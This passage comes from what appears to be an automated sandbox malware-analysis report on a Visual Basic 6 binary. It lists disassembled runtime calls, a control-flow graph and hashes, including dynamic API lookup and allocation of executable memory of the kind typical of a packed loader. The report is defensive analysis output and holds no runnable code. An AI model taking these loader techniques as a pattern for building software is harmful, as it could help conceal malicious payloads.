                  • __vbaAryUnlock.MSVBVM60(?), ref: 004FB99D
                  • __vbaAryLock.MSVBVM60(?,?,?), ref: 004FB9F3
                  • #644.MSVBVM60(?,?,?,?), ref: 004FBA02
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,?), ref: 004FBA0E
                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?), ref: 004FBA36
                  • __vbaAryLock.MSVBVM60(?,?), ref: 004FBA42
                  • #644.MSVBVM60(?,?,?), ref: 004FBA51
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 004FBA5D
                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?), ref: 004FBA85
                  • __vbaRedim.MSVBVM60(00000000,00000014,?,0040B518,00000001,0000007F,00000000,?,00000000,?,?,?,?,?,?,?), ref: 004FBAA8
                  • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,?,?,?,?,?), ref: 004FBAD2
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBB19
                  • #698.MSVBVM60(?,00000020), ref: 004FBB24
                  • #607.MSVBVM60(?,?,?,?,00000020), ref: 004FBB3A
                  • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,00000020), ref: 004FBB43
                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,00000020), ref: 004FBB4D
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,00000020), ref: 004FBB56
                  • __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000020), ref: 004FBB5E
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,00000020), ref: 004FBB6D
                  • #644.MSVBVM60(?,?,?,00000020), ref: 004FBB77
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBB9F
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBBC4
                  • #698.MSVBVM60(?,00000020), ref: 004FBBCF
                  • #606.MSVBVM60(?,?,?,00000020), ref: 004FBBE4
                  • __vbaStrMove.MSVBVM60(?,?,?,00000020), ref: 004FBBEE
                  • __vbaStrCopy.MSVBVM60(?,?,?,00000020), ref: 004FBBF7
                  • __vbaFreeStr.MSVBVM60(?,?,?,00000020), ref: 004FBBFF
                  • __vbaFreeVar.MSVBVM60(?,?,?,00000020), ref: 004FBC07
                  • #644.MSVBVM60(005022A0,?,?,?,00000020), ref: 004FBC0E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBC36
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBC5B
                  • #698.MSVBVM60(?,00000020), ref: 004FBC66
                  • #606.MSVBVM60(?,?,?,00000020), ref: 004FBC7B
                  • __vbaStrMove.MSVBVM60(?,?,?,00000020), ref: 004FBC85
                  • __vbaStrCopy.MSVBVM60(?,?,?,00000020), ref: 004FBC8E
                  • __vbaFreeStr.MSVBVM60(?,?,?,00000020), ref: 004FBC96
                  • __vbaFreeVar.MSVBVM60(?,?,?,00000020), ref: 004FBC9E
                  • #644.MSVBVM60(?,?,?,?,00000020), ref: 004FBCA5
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBCCD
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBCF2
                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 004FBD14
                  • __vbaAryLock.MSVBVM60(?,?), ref: 004FBD22
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBD72
                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 004FBD90
                  • __vbaAryLock.MSVBVM60(?,?), ref: 004FBD9E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBDC9
                  • __vbaAryUnlock.MSVBVM60(?), ref: 004FBDD2
                  • __vbaAryUnlock.MSVBVM60(?), ref: 004FBDDB
                  • __vbaAryUnlock.MSVBVM60(?,004FBE5C), ref: 004FBE28
                  • __vbaAryDestruct.MSVBVM60(00000000,?,?,004FBE5C), ref: 004FBE33
                  • __vbaFreeObj.MSVBVM60(00000000,?,?,004FBE5C), ref: 004FBE3B
                  • __vbaFreeObj.MSVBVM60(00000000,?,?,004FBE5C), ref: 004FBE43
                  • __vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,?,004FBE5C), ref: 004FBE4E
                  • __vbaFreeObj.MSVBVM60(00000000,?,00000000,?,?,004FBE5C), ref: 004FBE56
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Free$CheckHresult$Move$Copy$LockUnlock$Addref$#644Redim$#698$#606Destruct$#607List
                  • String ID:
                  • API String ID: 844423419-0
                  • Opcode ID: 3dcb49cc3a37dbff05000aed2ffd19149b0dabac2d9136581919e8d21046880e
                  • Instruction ID: 1dfdef46ee2a8d9599e7190eb775b25752a7f3fddfafa07b0f52f821d0789b03
                  • Opcode Fuzzy Hash: 3dcb49cc3a37dbff05000aed2ffd19149b0dabac2d9136581919e8d21046880e
                  • Instruction Fuzzy Hash: AC620B71900208ABCF14EFA5CC85EEEB7B9FF49704F14456EF205BB1A1DB3999058B64

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 226 4ff318-4ff390 call 4f9f8b call 4ff241 __vbaFreeVar call 4faf77 233 4ffa08-4ffa50 __vbaAryUnlock 226->233 234 4ff396-4ff3a3 call 4bca71 226->234 234->233 238 4ff3a9-4ff443 __vbaAryLock #644 __vbaAryUnlock call 4a78d5 call 4fef43 __vbaObjSet __vbaObjSetAddref __vbaFreeObj call 4a6295 __vbaObjSetAddref #644 __vbaFreeObj 234->238 238->233 245 4ff449-4ff478 __vbaObjSetAddref call 4fb547 __vbaFreeObj 238->245 245->233 248 4ff47e-4ff490 245->248 249 4ff4ae 248->249 250 4ff492-4ff495 248->250 253 4ff4b5-4ff4c1 249->253 251 4ff497-4ff49a 250->251 252 4ff4a5-4ff4ac 250->252 251->253 254 4ff49c-4ff4a3 251->254 252->253 255 4ff4f9 253->255 256 4ff4c3-4ff4ea call 4ffa60 253->256 254->253 258 4ff4fe-4ff502 255->258 259 4ff4ef-4ff4f7 __vbaFreeVar 256->259 260 4ff504-4ff511 call 4fb3b0 258->260 261 4ff552-4ff556 258->261 259->258 260->261 269 4ff513-4ff54d call 4ffa60 __vbaFreeVar call 40b560 __vbaSetSystemError 260->269 263 4ff558 call 4fc4f4 261->263 264 4ff5a1-4ff5a5 261->264 273 4ff55d-4ff560 263->273 266 4ff5ac-4ff5b0 264->266 267 4ff5a7 call 4facf6 264->267 271 4ff5fb-4ff603 266->271 272 4ff5b2 call 4fb375 266->272 267->266 269->261 275 4ff605-4ff612 call 4fb3b0 271->275 276 4ff653-4ff65b 271->276 284 4ff5b7-4ff5ba 272->284 273->264 274 4ff562-4ff59c call 4ffa60 __vbaFreeVar call 40b560 __vbaSetSystemError 273->274 274->264 275->276 293 4ff614-4ff64e call 4ffa60 __vbaFreeVar call 40b560 __vbaSetSystemError 275->293 282 4ff65d-4ff665 call 4ffba5 276->282 283 4ff6a6-4ff6ae 276->283 282->283 306 4ff667-4ff6a1 call 4ffa60 __vbaFreeVar call 40b560 __vbaSetSystemError 282->306 287 4ff6fe-4ff706 283->287 288 4ff6b0-4ff6bd call 4fb3b0 283->288 284->271 291 4ff5bc-4ff5f6 call 4ffa60 __vbaFreeVar call 40b560 __vbaSetSystemError 284->291 296 4ff708 call 4fc731 287->296 297 4ff751-4ff759 287->297 288->287 309 4ff6bf-4ff6f9 call 4ffa60 __vbaFreeVar call 40b560 __vbaSetSystemError 288->309 291->271 293->276 312 4ff70d-4ff710 296->312 303 4ff75b-4ff763 call 4fb2ba 297->303 304 4ff7a4-4ff7b4 297->304 303->304 329 4ff765-4ff79f call 4ffa60 __vbaFreeVar call 40b560 __vbaSetSystemError 303->329 311 4ff7b7-4ff7bc 304->311 306->283 309->287 315 4ff966-4ff969 311->315 316 4ff7c2-4ff7c5 311->316 312->297 317 4ff712-4ff74c call 4ffa60 __vbaFreeVar call 40b560 __vbaSetSystemError 312->317 330 4ff96b-4ff9bd call 40b6e0 __vbaSetSystemError __vbaAryLock call 4fb0fc 315->330 331 4ff9d3-4ffa03 #644 call 4a78c6 #644 call 4a78c6 315->331 323 4ff7cb-4ff953 __vbaAryLock call 4fb424 __vbaStrMove __vbaAryLock __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat call 4fae72 __vbaAryUnlock __vbaFreeStrList __vbaFreeVar call 4fb424 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 4f9d43 __vbaStrVarVal #644 call 40b6a0 __vbaSetSystemError __vbaFreeStrList __vbaFreeVar __vbaAryUnlock 316->323 324 4ff955-4ff961 316->324 317->297 323->324 324->311 329->304 350 4ff9c2-4ff9ce __vbaAryUnlock __vbaFreeVar 330->350 331->233 350->331
                  APIs
                    • Part of subcall function 004F9F8B: __vbaStrCat.MSVBVM60(0040B650,0040B648), ref: 004FA013
                    • Part of subcall function 004F9F8B: __vbaStrMove.MSVBVM60(0040B650,0040B648), ref: 004FA01D
                    • Part of subcall function 004F9F8B: __vbaStrCat.MSVBVM60(bvm,00000000,0040B650,0040B648), ref: 004FA028
                    • Part of subcall function 004F9F8B: __vbaStrMove.MSVBVM60(bvm,00000000,0040B650,0040B648), ref: 004FA032
                    • Part of subcall function 004F9F8B: __vbaStrCat.MSVBVM60(0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA03D
                    • Part of subcall function 004F9F8B: GetModuleHandleW.KERNEL32(00000000,?,0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA055
                    • Part of subcall function 004F9F8B: __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA069
                    • Part of subcall function 004F9F8B: __vbaFreeVar.MSVBVM60 ref: 004FA074
                    • Part of subcall function 004F9F8B: __vbaStrVarVal.MSVBVM60(?,?,?), ref: 004FA0A6
                    • Part of subcall function 004F9F8B: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 004FA0B0
                    • Part of subcall function 004F9F8B: GetProcAddress.KERNEL32(00000000,?), ref: 004FA0BC
                    • Part of subcall function 004FF241: __vbaSetSystemError.MSVBVM60(000000FF,00000022,?,00000004), ref: 004FF283
                  • __vbaFreeVar.MSVBVM60(?), ref: 004FF37D
                    • Part of subcall function 004FAF77: #644.MSVBVM60(?,004BDA58), ref: 004FAFBA
                    • Part of subcall function 004FAF77: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,00000000,?,004BDA58), ref: 004FAFE1
                    • Part of subcall function 004FAF77: __vbaAryLock.MSVBVM60(?,?,00000000,00000000,?,004BDA58), ref: 004FAFEF
                    • Part of subcall function 004FAF77: #644.MSVBVM60(?,?,?,00000000,00000000,?,004BDA58), ref: 004FAFFE
                    • Part of subcall function 004FAF77: __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000000,?,004BDA58), ref: 004FB009
                  • __vbaAryLock.MSVBVM60(004FF2F8,005032F8,?), ref: 004FF3B4
                  • #644.MSVBVM60(89645E5F,004FF2F8,005032F8,?), ref: 004FF3C3
                  • __vbaAryUnlock.MSVBVM60(004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF3CE
                    • Part of subcall function 004FEF43: #644.MSVBVM60(?,00000000,0040BEAC,00000080), ref: 004FEF8D
                    • Part of subcall function 004FEF43: #644.MSVBVM60(?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFA5
                    • Part of subcall function 004FEF43: #644.MSVBVM60(00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFC5
                    • Part of subcall function 004FEF43: #644.MSVBVM60(00000000,00000000,00000000,00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFD7
                    • Part of subcall function 004FEF43: #644.MSVBVM60(00000000,00000000,00000000,00000000,00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFE3
                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF3F7
                  • __vbaObjSetAddref.MSVBVM60(005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF406
                  • __vbaFreeObj.MSVBVM60(005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF40E
                  • __vbaObjSetAddref.MSVBVM60(?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF424
                  • #644.MSVBVM60(00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF42A
                  • __vbaFreeObj.MSVBVM60(00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF43B
                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F), ref: 004FF45D
                    • Part of subcall function 004FB547: __vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB5AE
                    • Part of subcall function 004FB547: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB5D8
                    • Part of subcall function 004FB547: __vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB5F7
                    • Part of subcall function 004FB547: __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?), ref: 004FB613
                    • Part of subcall function 004FB547: __vbaStrMove.MSVBVM60(?,?,00000000,?,?), ref: 004FB61D
                    • Part of subcall function 004FB547: __vbaStrCopy.MSVBVM60(?,?,00000000,?,?), ref: 004FB62A
                    • Part of subcall function 004FB547: __vbaFreeStr.MSVBVM60(?,?,00000000,?,?), ref: 004FB632
                    • Part of subcall function 004FB547: __vbaFreeObj.MSVBVM60(?,?,00000000,?,?), ref: 004FB63A
                    • Part of subcall function 004FB547: __vbaFreeVar.MSVBVM60(?,?,00000000,?,?), ref: 004FB642
                    • Part of subcall function 004FB547: __vbaObjSetAddref.MSVBVM60(?,?,?,?,00000000,?,?), ref: 004FB64E
                    • Part of subcall function 004FB547: __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB66A
                    • Part of subcall function 004FB547: __vbaStrMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB674
                  • __vbaFreeObj.MSVBVM60(00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8), ref: 004FF470
                  • __vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF4F2
                  • __vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,00000000,00000000,000000FF,00000000,?,00000000,00503300,00503330,00000000,?,00000000), ref: 004FF542
                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,00000000,00000000,000000FF,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF54D
                  • __vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF591
                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF59C
                  • __vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF5EB
                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF5F6
                  • __vbaFreeVar.MSVBVM60(?,?,005032B8,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000), ref: 004FF643
                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF64E
                  • __vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF696
                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF6A1
                  • __vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,00000000,000000FF,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000), ref: 004FF6EE
                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,00000000,000000FF,00000000,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF6F9
                  • __vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF741
                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF74C
                  • __vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF794
                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF79F
                  • __vbaAryLock.MSVBVM60(?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?), ref: 004FF7D2
                  • __vbaStrMove.MSVBVM60(00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?), ref: 004FF7FC
                  • __vbaAryLock.MSVBVM60(004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF80D
                  • __vbaStrMove.MSVBVM60(004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF81C
                  • __vbaStrCat.MSVBVM60(0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4), ref: 004FF827
                  • __vbaStrMove.MSVBVM60(0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4), ref: 004FF831
                  • __vbaStrCat.MSVBVM60(00000000,00000000,0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF839
                  • __vbaStrMove.MSVBVM60(00000000,00000000,0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF843
                  • __vbaStrCat.MSVBVM60(?,00000000,00000000,00000000,0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330), ref: 004FF84C
                    • Part of subcall function 004FAE72: __vbaVarVargNofree.MSVBVM60 ref: 004FAEB6
                    • Part of subcall function 004FAE72: __vbaStrVarVal.MSVBVM60(?,00000000), ref: 004FAEC0
                    • Part of subcall function 004FAE72: #644.MSVBVM60(00000000,?,00000000), ref: 004FAEC6
                    • Part of subcall function 004FAE72: __vbaSetSystemError.MSVBVM60(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAEE3
                    • Part of subcall function 004FAE72: __vbaFreeStr.MSVBVM60(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAEEB
                    • Part of subcall function 004FAE72: __vbaAryLock.MSVBVM60(?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAF0E
                    • Part of subcall function 004FAE72: __vbaSetSystemError.MSVBVM60(00000000,?,?,?,00000000,?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000), ref: 004FAF2B
                    • Part of subcall function 004FAE72: __vbaAryUnlock.MSVBVM60(?,00000000,?,?,?,00000000,?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 004FAF34
                    • Part of subcall function 004FAE72: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAF3F
                  • __vbaAryUnlock.MSVBVM60(004FF2F8,00000008,C3FFF02E,?,00000000,00000000,00000000,0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?), ref: 004FF881
                  • __vbaFreeStrList.MSVBVM60(00000004,?,00000040,?,00000000,004FF2F8,00000008,C3FFF02E,?,00000000,00000000,00000000,0040C440,00000000,004FF2F8,00000000), ref: 004FF898
                  • __vbaFreeVar.MSVBVM60(005032F8,?), ref: 004FF8A3
                    • Part of subcall function 004FB424: __vbaStrCopy.MSVBVM60 ref: 004FB467
                    • Part of subcall function 004FB424: #526.MSVBVM60(?,00000104), ref: 004FB476
                    • Part of subcall function 004FB424: __vbaStrVarMove.MSVBVM60(?,?,00000104), ref: 004FB47F
                    • Part of subcall function 004FB424: __vbaStrMove.MSVBVM60(?,?,00000104), ref: 004FB489
                    • Part of subcall function 004FB424: __vbaFreeVar.MSVBVM60(?,?,00000104), ref: 004FB491
                    • Part of subcall function 004FB424: __vbaSetSystemError.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4CE
                    • Part of subcall function 004FB424: #616.MSVBVM60(?,00000000,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4DB
                    • Part of subcall function 004FB424: __vbaStrMove.MSVBVM60(?,00000000,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4E5
                    • Part of subcall function 004FB424: __vbaStrCopy.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4FF
                    • Part of subcall function 004FB424: __vbaFreeStr.MSVBVM60(004FB533,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB525
                    • Part of subcall function 004FB424: __vbaFreeStr.MSVBVM60(004FB533,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB52D
                  • __vbaStrMove.MSVBVM60(?,005032F8,?), ref: 004FF8B5
                  • __vbaStrCat.MSVBVM60(0040C440,00000000,?,005032F8,?), ref: 004FF8C0
                  • __vbaStrMove.MSVBVM60(0040C440,00000000,?,005032F8,?), ref: 004FF8CA
                  • __vbaStrCat.MSVBVM60(00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF8D2
                  • __vbaStrMove.MSVBVM60(00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF8DC
                  • __vbaStrCat.MSVBVM60(?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF8E5
                  • __vbaStrMove.MSVBVM60(?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF8EF
                    • Part of subcall function 004F9D43: __vbaStrCopy.MSVBVM60(00000000,00503300,00004008), ref: 004F9D8F
                    • Part of subcall function 004F9D43: __vbaVarSub.MSVBVM60(?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DCE
                    • Part of subcall function 004F9D43: __vbaI4Var.MSVBVM60(00000000,?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DD4
                    • Part of subcall function 004F9D43: __vbaRedim.MSVBVM60(00000080,00000001,00503218,00000011,00000001,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00503300), ref: 004F9DE8
                    • Part of subcall function 004F9D43: __vbaFreeVar.MSVBVM60(00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DF3
                    • Part of subcall function 004F9D43: __vbaStr2Vec.MSVBVM60(?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DFF
                    • Part of subcall function 004F9D43: __vbaAryMove.MSVBVM60(?,?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9E0C
                    • Part of subcall function 004F9D43: __vbaVarSub.MSVBVM60(?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000,00503300), ref: 004F9E44
                    • Part of subcall function 004F9D43: __vbaI4Var.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E4A
                    • Part of subcall function 004F9D43: __vbaFreeVar.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E54
                  • __vbaStrVarVal.MSVBVM60(00000000,00000008,00000008,00000000,?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF906
                  • #644.MSVBVM60(00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF90C
                  • __vbaSetSystemError.MSVBVM60(00000000,00000001,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF919
                  • __vbaFreeStrList.MSVBVM60(00000005,?,00000040,?,00000000,00000000,00000000,00000001,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000), ref: 004FF934
                  • __vbaFreeVar.MSVBVM60(00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF93F
                  • __vbaAryUnlock.MSVBVM60(?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF948
                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8), ref: 004FF982
                  • __vbaAryLock.MSVBVM60(004FF2F8,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?), ref: 004FF99C
                    • Part of subcall function 004FB0FC: #644.MSVBVM60(?,004EBCC9), ref: 004FB150
                    • Part of subcall function 004FB0FC: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000004,?,004EBCC9), ref: 004FB171
                    • Part of subcall function 004FB0FC: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,?,00003000,00000040,00000000,00000000,00000004,?,004EBCC9), ref: 004FB18D
                    • Part of subcall function 004FB0FC: __vbaAryLock.MSVBVM60(?,?,00000000,00000004,?,004EBCC9), ref: 004FB19C
                    • Part of subcall function 004FB0FC: #644.MSVBVM60(?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1AB
                    • Part of subcall function 004FB0FC: __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1B6
                    • Part of subcall function 004FB0FC: __vbaAryLock.MSVBVM60(?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1D7
                    • Part of subcall function 004FB0FC: #644.MSVBVM60(?,?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1E6
                    • Part of subcall function 004FB0FC: __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1F1
                    • Part of subcall function 004FB0FC: __vbaAryLock.MSVBVM60(?,00000000,?,00401006,00000000,00000000,?,?,?,?,?,00000000,-00000004,?,?,?), ref: 004FB216
                  • __vbaAryUnlock.MSVBVM60(004FF2F8,?,?,?,004FF2F8,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4), ref: 004FF9C6
                  • __vbaFreeVar.MSVBVM60(004FF2F8,?,?,?,004FF2F8,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4), ref: 004FF9CE
                  • #644.MSVBVM60(00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8), ref: 004FF9D9
                  • #644.MSVBVM60(-00000004,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?), ref: 004FF9F3
                  • __vbaAryUnlock.MSVBVM60(?,004FFA51,?), ref: 004FFA4B
                  Strings
                  Memory Dump Source
